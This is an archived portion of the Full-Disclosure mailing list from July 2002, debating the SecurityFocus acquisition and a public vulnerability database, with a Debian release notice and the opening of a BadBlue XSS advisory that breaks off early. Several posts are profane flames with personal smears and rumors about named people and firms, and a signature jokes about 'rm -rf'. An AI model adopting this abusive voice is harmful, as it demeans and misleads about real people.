-- Pascal Meunier, Ph.D., M.Sc. Assistant Research Scientist, CERIAS Purdue University From coastalhope at hushmail.com Fri Jul 19 22:58:13 2002 From: coastalhope at hushmail.com (coastalhope at hushmail.com) Date: Fri, 19 Jul 2002 14:58:13 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among Message-ID: <200207192158.g6JLwDK54242@mailserver4.hushmail.com> > - ---------- > Fat Checks Are Good Biz > They buy warm houses for March > Is yours made of glass? >>OK, so now the idiots who don't have the necessary social skills to get >>paying jobs start tossing rocks at those who work for a living. I have worked with you Steve (Manzuik) and you might want to consider the glass house analogy again. You are commonly percieved by co-workers to have the personality of a carrion bird and the social skills to match. >Yeah, fat >checks are a good biz you are damn right, and what is wrong with that? If >you are good at something, go get a job doing that which you are good at. >How can you fault someone for that? I bet you must respect that quite a bit. Especially since you cannot hold a job in this industry for more than a year at a time. How employers now in the last 3 years? 5? >>Weld Pond has contributed more to the >>security industry in general than half the fucks on this list INCLUDING >>ME! It is no surprise that his skill are in demand, do you expect him to >>flip burgers for a living? You say 'INCLUDING ME' like you've actually contributed something. Aside from starting mailing lists your net contribution has been 0. >>I consider both Jay and Chris to not only be true hackers but to also be >>friends. So other than a >>bit of common sense what is the hidden agenda? You realize you are judged by the company you keep? Weld is a vacilating idiot who rode Mudge's coat tails to success and Jay has less luck with jobs than you do. Probably because he often forgets to take his meds. I doubt securityfocus has much to worry about with idiots like you people rallying to the cause. ch Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From Ken.Williams at ey.com Fri Jul 19 23:04:08 2002 From: Ken.Williams at ey.com (Ken.Williams at ey.com) Date: Fri, 19 Jul 2002 17:04:08 -0500 Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database Message-ID: > Message: 6 > Date: Fri, 19 Jul 2002 16:42:13 -0400 (EDT) > From: "Steven M. Christey" > To: full-disclosure at lists.netsys.com > Subject: [Full-Disclosure] Creating a publicly maintained vulnerability database > Reply-To: full-disclosure at lists.netsys.com > > With organizations like CERT/CC projecting 4,000+ vulnerabilities this > year alone, the amount of research and quality-checking that is > required to maintain a good vulnerability database is growing > prohibitive, even if most of the vulnerabilities were discovered and > announced by many people in the community. as usual, Steve hit the nail smack on the head. back when i owned (and almost singlehandedly maintained) PacketStorm (PSS), i only had to deal with a few hundred vulns/year. i put in 80+ hour weeks, but i got it done (for the most part). now, with the number of vulns reaching 4000+ per year, it really does take a team of highly skilled researchers to maintain a vuln db. i know exactly what kind of people it takes, and i know just how interesting (and boring) the work can be, because i am currently spending about 180% (70+ hrs/wk) of my salaried time maintaining vuln dbs and managing a team that researches and validates vulns. > As suggested by others, a publicly maintained vulnerability database > is a possibility, but it would need a large-scale community effort to > populate and maintain, and there would be issues of quality control. maintenance and quality control become huge issues when you have to process 4000+ vulns/yr. finding people who know what gdb is AND spell correctly AND can legally work in the US AND are willing to work for less than $160,000/yr AND show up for work every day AND can pass a simple background check can also be a challenge. > Maintaining a vulnerability database also requires some different > skills than vulnerability research or system administration: > > - a stronger emphasis on writing for multiple audiences (technical > details and high-level summaries) and if you want a really useful vuln db, you need both tech details and hi-level summaries. > - identifying different technical areas and finding/keeping skilled > people to cover them (e.g. crypto, Linux kernels, CGI, programming > languages, etc.) and you have to have this too if you actually want the content in your vuln db to be validated. and what good is the vuln db if the content is NOT validated??? i have yet to see a single attempt at a public vuln db that contains VALIDATED CONTENT. CVE comes closest (the content is very well validated), but it is of course a vuln dictionary rather than a vuln database. > - defining what will be in the database (this was an issue in the > early days of CVE because everyone has different definitions of > "vulnerability," and it's still an issue to some degree) and being the perfectionist that i am, i want ALL of it in the db. > - ironing out details like workaround and fix information (even > determining whether the vendor has fixed the problem can be a > challenge; researcher-suggested patches can be broken; some > workarounds aren't feasible) and if the vuln db is going to really be useful, you will make sure to have all of the patch info, the vendor info, the 3rd party patches, and the workarounds. different people are going to need different solutions. > - trying to distinguish between closely related vulnerabilities (is > there one vulnerability or two? Did vendor X and Y really fix the > same issue? Did vendor W's fix really address researcher Z's report > from two months earlier?) stop it Steve! my head already hurts without your mentioning this. > - deciding on a severity metric (IMHO, high/medium/low must die) and training all of the people who maintain your database to fully understand and consistently apply that metric is another issue. > - getting consistent terminology (your XSS is not my XSS (or CSS)! > Same with remote/local, directory traversal, etc.) > > - ensuring accuracy of information (which is sometimes problematic > even in "full disclosure" instances) independent validation is the only good answer, and this will consume 89.54% of your time. > - actually validating whether the reported vulnerabilities are real or > not (a daunting challenge for anything but the most commonly > deployed products and configurations) especially tough if you are a small, public, non-profit org and you don't have the $$$ to purchase the technology affected by the vuln (and the vendor won't give you a copy - not even an eval copy that may be different from the full licensed version mentioned in the original vuln advisory). > - then designing, implementing, and maintaining the databases and the > server(s) that support it. seems like many of the private, for-profit databases focus on this aspect, at the expense of the content. imo, the container is entirely useless if the content isn't there. > Chris Wysopal said: > > >Even so a completely non-corporate and free vuln database would be > >something good for the community. > > NIST's ICAT database (http://icat.nist.gov) is freely available for ---[snipped stuff about icat and cerias]--- unfortunately, neither of those projects has offered a truly comprehensive and timely vuln db yet. until and unless some benevolent entity provides big $$$ to fund such an endeavor, i doubt we'll be seeing a quality, comprehensive (i want exploit code too!), *validated*, public vuln db any time soon. ICAT ain't bad though - need to be more timely and provide more info for each vuln. > Steve Christey > CVE Editor if i burn out and have to retire to the beaches of n. san fran, i will be calling Steve and asking him to be my sponsor at Vulnerabilities Anonymous. Regards, kw Ken Williams ; CISSP ; Technical Lead ; CVE Editorial Board eSecurityOnline - an eSecurity Venture of Ernst & Young ken.williams at ey.com ; www.esecurityonline.com ; 1-877-eSecurity ________________________________________________________________________ The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer. Thank you. Ernst & Young LLP From coastalhope at hushmail.com Fri Jul 19 23:39:50 2002 From: coastalhope at hushmail.com (coastalhope at hushmail.com) Date: Fri, 19 Jul 2002 15:39:50 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among Message-ID: <200207192239.g6JMdoA58034@mailserver4.hushmail.com> >Nice an anonymous reply from someone too chicken shit to use his real >name and yet he seems to think he knows a thing or two about me. A thing or two is about where your entertainment value starts to dwindle. If there are more interesting things to know about you please feel free to share. >Interesting none of my clients, employees, or other co-workers feel this >way. Again, its nice to see that you don't have the balls to use your >real name in this post. You are either woefully stupid (I am voting on that) or you have a short memory. You have left many people in your wake who would rather eat razor blades than work with you again. >Again, you know nothing about me or my employment situation. It hasn't >been 5 in three years, but nice try. Not that I owe some pussy to >afraid to use his real name an explanation but lets review the last >three years; > Has your stupidity finally encroached on your memory? Your review comes up short. Much like your IQ. >> You say 'INCLUDING ME' like you've actually contributed >> something. Aside from starting mailing lists your net >> contribution has been 0. > >Learn how to read assclown. I said that Weld/L0pht have contributed >much more than I have. And yeah dumb fuck I have contributed a bit and >plan on contributing more in the future. Contributing more than you have is hardly a noteworthy event. One eyed man being king in the kingdom of the blind and all that. Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From mxe20 at psu.edu Sat Jul 20 00:06:23 2002 From: mxe20 at psu.edu (Mark Earnest) Date: Fri, 19 Jul 2002 19:06:23 -0400 (EDT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among In-Reply-To: <200207192239.g6JMdoA58034@mailserver4.hushmail.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Perhaps this is off topic here, but were there plans at any point to discuss security issues and report on vulnerabilities on this mailing list? Would be too much to ask that the pissing matches be taken off list? - -- Mark Earnest ~~~~~~~~~~~~ Senior Systems Programmer ASET/Emerging Technologies Penn State University Email: mxe20 at psu.edu Office Phone: 814-863-2064 Public Key - http://mearnest.oas.psu.edu/gpgkey.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQE9OJtyXIT9wt3I2GMRAtsvAJ9XNltcWt/wC4wmhdCm7nRXoG5JkQCgjKmm ZtRkFHlyrSjIIREUPnq1LTg= =Ekl/ -----END PGP SIGNATURE----- From madduck at debian.org Sat Jul 20 00:12:42 2002 From: madduck at debian.org (martin f krafft) Date: Sat, 20 Jul 2002 01:12:42 +0200 Subject: [Full-Disclosure] ANNOUNCING: Debian GNU/Linux 3.0 Message-ID: <20020719231242.GA10546@fishbowl.madduck.net> We wouldn't want to keep this from your eyes, Full disclosure it is, and while this isn't a vulnerability, I am sure it will interest quite a few. It is, after all, security related and long awaited... http://www.debian.org/News/2002/20020719 Thank you, Debian!!! -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck a c programmer asked whether computers have buddha's nature. as the answer, the master did "rm -rf" on the programmer's home directory. and then the c programmer became enlightened... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020720/fa9c21ea/attachment.bin From haiku at hushmail.com Sat Jul 20 00:28:26 2002 From: haiku at hushmail.com (haiku at hushmail.com) Date: Fri, 19 Jul 2002 16:28:26 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: <200207192328.g6JNSQW63259@mailserver4.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >As a consulting company that publishes vulnerability information and tools, >we contribute to the pool that we drink out of. Oh. So this is your argument. You contribute to it, therefore you may use it? Wait .... I thought you said the information should be free for non-commercial use. Does not taking from the pool to use within a company constitute commercial use? Genius! So, the "do as I say and not as I do" applies here? What other double-standards are we also applying in this discussion? You know, Chris, you really puzzle me. You look a person holding a very sharp axe in their hand directly in the eye, then you put your neck on the block. And you know DAMN WELL I'm going to bring this fucker right down on you. As you wish. So, now that we've clarified that there is, in fact, a double-standard here, this would explain why a certain vicious rumor about the @stake toolkit that somehow found the light of day contains not only many, many publicly available exploits, but also some 0day that the vendors have yet to fix. Tell me, Chris, I'm a little confused how this applies to both "Responsible Disclosure" and "information being free for non-commercial use." From my take, there's nothing responsible whatsoever about possessing, and distributing a toolkit that contains exploits for problems that aren't even fixed. To me, it also doesn't constitute "non-commercial use" that this rumored toolkit is used by @stake pen testers when they're at a gig. Why Johnny Ringo .... you look like somebody just walked over your grave. >So would you use a non-profit database that was populated by the >vulnerability reporters themselves? That is what I am proposing. Chris, hellNbak AKA Steve Manziuk can't even read an email, get the point, and intelligently respond. And he moderates a fucking mailing list! You've got to be shitting me. Oh, btw Steve, when I want to talk to you, I'll initiate the conversation; I have little time to waste on your inate ability to read and not comprehend. What about the folks that don't speak English as a first language, or no English whatsoever? In short, yeah, you could say I'm skeptical. And what's going to stop other information security companies from using it anyway? If the data is freely available, it's there for the harvest. If you want to prevent it from being exploited by outside parties, you have to neuter it to where there's no details whatsoever. Then, it becomes roughly tits on a boar. FYI, as I recall, the information in the Bugtraq Database is freely available to the public through their web site anyways. Perhaps you may have overlooked this. >For wanting a public vulnerability database? This is what the security >community is currently missing in a public and open format. There are open >source NIDS, vuln scanners, and other security tools. There are public >security mailing lists. There is a public vuln dictionary, CVE. But there >is no public vuln database. Why is everything else good to have >non-commercial alternatives for except a vuln database? The open source >tools could tie into it. The open source tools could tie into it. Open Source != Non-Commercial. Ok, as I recall, Renaud was at least making a little money off his project by offering support, while the rest of these pentest dirtbags exploiting Nessus (oh yeah, that's right, the alleged @Stake toolkit had Nessus sigs, did it not?) for whatever fee. Now, correct me if I'm wrong here, but first, doesn't this mean that Renaud would no longer be able to offer commercial support for his product? I think so. And I believe the same applies to Marty, as Sourcefire is offering commercial products built on Snort. Gee, what a fucking HUGE hole in your logic. And, you additionally fuck them in the process. Good job. >I certainly didn't mention restricting information. A public vulnerability >database would require the information to be open so that it could be in >the database. Ok, so you have a database that can be used commercially, or you don't. Notice how there's no fucking in-between? And what if a person wants to use the "non-commercial database" in their commercial product? Does this now require a licensing fee? Or do you just turn them away? This has sham written all over it. And of course, how does this differ from the Bugtraq Database? >@stake employees have contributed to the Snort project. I actually was >using Snort earlier today on a product pen test. It's great. Marty has >created something wonderful. A public vulnerability database would enhance >Snort not hurt it. We don't really do implementation work but we have >recommended to some of our customers that they install Snort. Horseshit. Non-commercial != Public, and vice-versa. The Bugtraq Database is public. How does Marty benefit from the database by no longer being able to use it? It sure as hell doesn't help his commercial venture, as near as I can tell. >You can support the First Amendment and still limit what you personally say >and write. I choose not to be vulgar in my list postings and I might even >advocate for others to not be vulgar but I would never want to ban that >langauge. I think it is a benfit to security if people can patch their >boxes before exploits are written. Nothing is a single bullet solution but >I think that certain disclosure practices can help make this happen. >Obviously a lot has to be done better on the vendor side. So while >advocating for people to follow certain disclosure practices I still don't >think there should be a law restricting free speech. Once someone has >chosen to publish information they are going to publish it. It is better >for the community that VulnWatch approve these messages so that everyone >can get the information at the same time. I really wish you weren't so two-faced, paradoxial, and self-righteous. And on that note, how does this make VulnWatch any different from any other security mailing list? Securiteam does the same thing. This list allegedly does the same thing. Bugtraq does the same thing. Bottom-line, there's going to be people that make money off security information whether you like it or not. @Stake does. SecurityFocus does. ISS does. NAI does. Even CERT does. Welcome to the capitalist world; leave your agendas and egos at the door. Any company that uses information/software provided by them tends to make money, as they spend less time down due to security incidents. Funny how economics work, isn't it? If you don't like it, might I recommend you move to Cuba? I hear they're still communist there, and you may find their way of thinking more inline with yours. I'd suspect you're not going to enjoy the same standard of living, though. haiku -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wloEARECABoFAj04oMwTHGhhaWt1QGh1c2htYWlsLmNvbQAKCRDCt+udg2XXB+ofAKCR 2eoCWaSG38HxQvUSeoHzHoJFMwCfV6BbSTdti70x5YCbA3CB4NTtv9A= =Ra4B -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From evrim at core.gen.tr Sat Jul 20 00:34:03 2002 From: evrim at core.gen.tr (evrim at core.gen.tr) Date: Sat, 20 Jul 2002 02:34:03 +0300 (EEST) Subject: [Full-Disclosure] show must go on w/ or w/o secfocus. Message-ID: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr> hi, Finally i've found the right place to discuss the secfocus. I'm 22 years old and i've some questions in my mind . Maybe people here may know the answers: 1. Why we did not argued when geek-girl transformed into secfocus? Nothing has changed. One firm bought another. Secfocus was also making money from work of all of us. (This is maybe cos' aleph1) 2. Everybody here knows that we need a database on this planet to learn more for fun or for profit because noone can know every hole in every os. So, who can guarantee that another list is not going to be acquired again in the future? 3. $75 million is very cheap. Do all the vuln-information costs 75$? I really don't think so. 4. A license is a must but how can we build a license for our vuln-info including exploits/methods? I don't think this is possible cos' every os has an owner and all material we'r working with belongs to them. 5. Do we really need a center like old geek-girl/ new secfocus in order to be informed about the community and development? Of course yes. So, only a commercial firm can build/maintain a system that can serve all of us 7/24. But we are talking about nonprofit vulnbase. How this can be built? *that i really don't know*. IMHO's: a)I think there will be a new vulnbase center and this will be very near to some security geek in somewhere on this world. But community will decide who will be the guy.b)I am a volunteer if there is an existing vulnbase/portal project. (i've made one portal before maybe helpful core.gen.tr)Just send me info.c)In addition to these i'm sure that nobody here wants to spend time on where we'r going to post our researches. It's useless. Instead we just want to spend time on our researches. Thnx. evrim. evrim at core.gen.tr From core at bokeoa.com Sat Jul 20 00:54:29 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Fri, 19 Jul 2002 17:54:29 -0600 Subject: [Full-Disclosure] ANNOUNCING: Debian GNU/Linux 3.0 References: <20020719231242.GA10546@fishbowl.madduck.net> Message-ID: <3D38A6B5.6020507@bokeoa.com> Woohoo! peace, core martin f krafft wrote: > We wouldn't want to keep this from your eyes, Full disclosure it is, > and while this isn't a vulnerability, I am sure it will interest quite > a few. It is, after all, security related and long awaited... > > http://www.debian.org/News/2002/20020719 > > Thank you, Debian!!! > From netsys at machine.org.uk Sat Jul 20 00:56:15 2002 From: netsys at machine.org.uk (Tim Brown) Date: Sat, 20 Jul 2002 00:56:15 +0100 Subject: [Full-Disclosure] Lets get on-topic In-Reply-To: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr> References: <1298.212.45.68.12.1027121643.squirrel@www.core.gen.tr> Message-ID: <200207192356.g6JNurII019960@firewall.home> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 All, Speaking as someone whose only recently become involved in security research, I don't know about anyone else here but I think there wold be more interesting research if people didn't get into public slanging matches, particlarly those who profess to be more experienced in security matters, I've seen one on topic posting in 22 since I joined this list on Thursday. Tim - -- Tim Brown -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9OKcyVAlO5exu9x8RAhZNAKCnblb8WkMwb9YD0/Y9UQKQPXnM4gCdHbLQ BoiiU1ImDRAdtYo72upG69E= =ttav -----END PGP SIGNATURE----- From mattmurphy at kc.rr.com Sat Jul 20 01:38:23 2002 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Fri, 19 Jul 2002 19:38:23 -0500 Subject: [Full-Disclosure] BadBlue 302 Status Message XSS Message-ID: <00ef01c22f85$c10855e0$e62d1c41@kc.rr.com> BadBlue 1.74 (presumably earlier) is susceptible to a cross-site scripting attack. When BadBlue is passed a name of a non-existant file path (or an existant folder) that does not end in a 0x2f character ("/") it returns a 302 status code containing some text: HTTP/1.0 302 found Location: /